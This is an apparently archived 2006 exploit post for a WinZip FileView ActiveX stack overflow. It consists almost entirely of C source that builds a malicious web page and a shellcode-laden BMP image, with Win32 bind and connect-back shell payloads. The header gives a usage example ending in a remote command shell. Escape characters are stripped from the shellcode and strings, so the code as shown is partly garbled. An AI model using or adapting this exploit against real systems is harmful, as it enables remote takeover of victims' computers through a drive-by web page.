winzip-bof.txt
Posted on 16 November 2006
/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit * ============================================================ * A vulnerability has been identified within Winzip that allows remote * attackers to execute arbitrary code. User interaction is required to * exploit this vulnerability in that the target must visit a malicious * web page. The flaw exists within "FileView" ActiveX control which * contains stack based overflow conditions. This exploit generates a * malicious html page and contains shellcode embedded within an image * file. Due to the random nature of the heap, this exploit uses hard * coded location of the image bytes within the heap and as such is * unreliable in exploitation of this bug, but has approximately 1 in * 6 hit ratio within the tested environment. * * Example. * $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0 * [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes) * [ Using target 'WinXP SP2(en) WinZIP 10.0.6667' * [ Creating image containing shellcode 'foo.bmp' * [ Creating html exploit page 'index.html' * $ * ... clicky clicky MSIE ... * $ telnet 192.168.1.223 4444 * Connected to 192.168.1.223. * Escape character is '^]'. * * Microsoft Windows XP [Version 5.1.2600] * (C) Copyright 1985-2001 Microsoft Corp. * * C:Documents and SettingsUserDesktop> * * - prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <getopt.h> #define NOPSIZE 999999 struct target { char* name; int retaddr; }; struct shellcode { char* name; short port; int host; char* shellcode; }; int targetno = 1; struct target targets[] = { {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269} /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */ }; int shellno = 2; struct shellcode shellcodes[] = { {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1, "x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5" "x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9" "xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b" "x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b" "x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5" "x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03" "x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26" "x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6" "x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26" "x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03" "xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a" "x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f" "x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77" "x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f" "x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74" "x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0" "xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8" "x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73" "xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41" "xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d" "xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d" "x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70" "xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22" "x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43" "x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"}, {"Win32 x86 connect() shellcode (4444/tcp default)",167,160, "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68" "x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9" "xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68" "x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3" "xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51" "x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6" "x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6" "xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"} }; char html1[]="<HTML> <HEAD> <TITLE></TITLE> </HEAD> " "<BODY> <SCRIPT LANGUAGE="VBScript"> Sub WZ" "FILEVIEW_OnAfterItemAdd(Item) WZFILEVIEW.FilePa" "ttern = ""; /* smash the stack here */ char html2[]="" end sub </SCRIPT> <IMG SRC=""; char html3[]=""> <OBJECT ID="WZFILEV" "IEW" WIDTH=200 HEIGHT=200 CLASSID="CLSID:A09A" "E68F-B14D-43ED-B713-BA413F034904"> </OBJECT> " " </BODY> </HTML> "; char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00" "x00x28x00x00x00xe7x03x00x00xe7x03x00x00" "x01x00x18x00x00x00x00x00x08xbbx2dx00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00"; int ret; void help(char* progname){ int count; printf("[ Usage instructions. [ "); printf("[ %s <required> (optional) [ [ --filename|-f <file.html> ",progname); printf("[ --imgname|-i <image.bmp> [ --shellcode|-s <shell#> "); printf("[ --shellport|-p (port) "); printf("[ --shellhost|-i (ip) "); printf("[ --target|-t <target#/0xretaddr> [ "); printf("[ Target#'s "); for(count = 0;count <= targetno - 1;count++){ printf("[ %d %s 0x%x ",count,targets[count],targets[count]); } printf("[ [ Shellcode#'s "); for(count = 0;count <= shellno - 1;count++){ printf("[ %d "%s" (length %d bytes) ",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); } exit(0); } void setret(char* retarg){ int value = atoi(retarg); switch(value){ case 0: printf("[ Using target '%s' ",targets[ret].name); ret = targets[ret].retaddr; break; default: ret = strtoul(retarg,NULL,16); printf("[ Using return address '0x%x' ",ret); break; } } int main(int argc, char* argv[]){ unsigned long i, fd; int c, index, payg, paya, lhost; short shellport, shellport2; int ishell = 0, itarg = 0; char *buffer, *file, *img, *payload; static struct option options[] = { {"filename", 1, 0, 'f'}, {"imgname", 1, 0, 'i'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 's'}, {"shellport", 1, 0, 'p'}, {"shellhost", 1, 0, 'd'}, {"help", 0, 0,'h'} }; printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit "); while(c != -1){ c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index); switch(c){ case 'f': file = optarg; break; case 'i': img = optarg; break; case 't': itarg = 1; setret(optarg); if(strlen((char*)&ret) < 4){ fprintf(stderr,"[ Selected target contains a null address! "); exit(-1); } break; case 's': if(ishell==0){ payg = atoi(optarg); switch(payg){ case 0: printf("[ Using shellcode '%s' (%d bytes) ",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; case 1: printf("[ Using shellcode '%s' (%d bytes) ",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; default: printf("[ Invalid shellcode selection %d ",payg); exit(0); break; } } break; case 'p': if(ishell==1){ if(shellcodes[payg].port > -1){ paya = strlen(payload); shellport = atoi(optarg); shellport2 = shellport; shellport =(shellport&0xff)<<8 | shellport>>8; memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); if(paya > strlen(payload)) { printf("[ Error shellcode port introduces null bytes "); exit(1); } printf("[ Shellcode port changed to '%u' ",atoi(optarg)); } else{ printf("[ (%s) port selection is ignored for current shellcode ",optarg); } } else{ printf("[ No shellcode selected yet, ignoring (%s) port selection ",optarg); } break; case 'd': if(ishell==1){ if(shellcodes[payg].host > -1){ paya = strlen(payload); lhost = inet_addr(optarg); memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost)); if(paya > strlen(payload)){ printf("[ Error shellhost introduces null bytes "); exit(1); } printf("[ Shellhost has been changed to '%s' ",optarg); } else{ printf("[ (%s) shellhost selection is ignored for current shellcode ",optarg); } } else { printf("[ No shellcode selected yet, ignoring (%s) shellhost selection ",optarg); } break; case 'h': help(argv[0]); break; default: break; } } if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){ printf("[ Error insufficient arguements, try running '%s --help' ",argv[0]); exit(0); } // create image printf("[ Creating image containing shellcode '%s' ",img); fd = open(img,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %s ",file); exit(-1); } write(fd,bmphdr,sizeof(bmphdr)); for(i = 0;i < NOPSIZE;i++){ write(fd,"x90",1); } write(fd,payload,strlen(payload)); close(fd); // create html printf("[ Creating html exploit page '%s' ",file); fd = open(file,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %s ",file); exit(-1); } write(fd,html1,strlen(html1)); for(i = 0;i < 265;i++){ write(fd,"A",1); } write(fd,&ret,4); for(i = 0;i < 1827;i++){ write(fd,"A",1); } write(fd,html2,strlen(html2)); write(fd,img,strlen(img)); write(fd,html3,strlen(html3)); close(fd); }
